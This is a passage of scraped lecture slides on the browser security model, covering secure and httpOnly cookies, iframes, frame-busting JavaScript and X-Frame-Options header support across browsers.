• Provides confidentiality against network attacker• Browser will only send cookie back over HTTPS
• … but no integrity• Can rewrite secure cookies over HTTP
Þ network attacker can rewrite secure cookiesÞ can log user into attacker’s account
![Page 68: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/68.jpg)
httpOnly Cookies
BrowserServer
GET …
HTTP Header:Set-cookie: NAME=VALUE ;
httpOnly
• Cookie sent over HTTP(s), but not accessible to scripts• cannot be read via document.cookie• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
![Page 69: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/69.jpg)
FRAMES AND FRAME BUSTING
![Page 70: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/70.jpg)
<iframe name=“myframe”src=“http://www.google.com/”>
This text is ignored by most browsers.</iframe>
FramesEmbed HTML documents in other documents
![Page 71: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/71.jpg)
Frame Busting
Goal: prevent web page from loading in a framen example: opening login page in a frame will display
correct passmark image
Frame busting:
if (top != self)top.location.href = location.href
![Page 72: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/72.jpg)
Better Frame Busting
Problem: Javascript OnUnload event
Try this instead:
<body onUnload="javascript: cause_an_abort;)">
if (top != self)
top.location.href = location.href
else { … code of page here …}
![Page 73: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/73.jpg)
Even better (after ~2010)
Set X-Frame-Options HTTP response headern Tell browser not to render a page in a <frame> or <iframe>n Ensuring that content is not embedded into other sites. n Use options "DENY", "SAMEORIGIN", or "ALLOW-FROM uri"
Browser DENY/SAMEORIGIN Support Introduced
ALLOW-FROM Support Introduced
Chrome 4.1.249.1042 Supports CSP frame-ancestors instead
Firefox (Gecko) 3.6.9 (1.9.2.9) 18.0
Internet Explorer 8.0 9.0Opera 10.50
Safari 4.0 Won't support - Supports CSP frame-ancestors ins
![Page 74: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/74.jpg)
SummaryHttpRendering contentIsolationCommunicationNavigationSecurity User InterfaceCookiesFrames and frame busting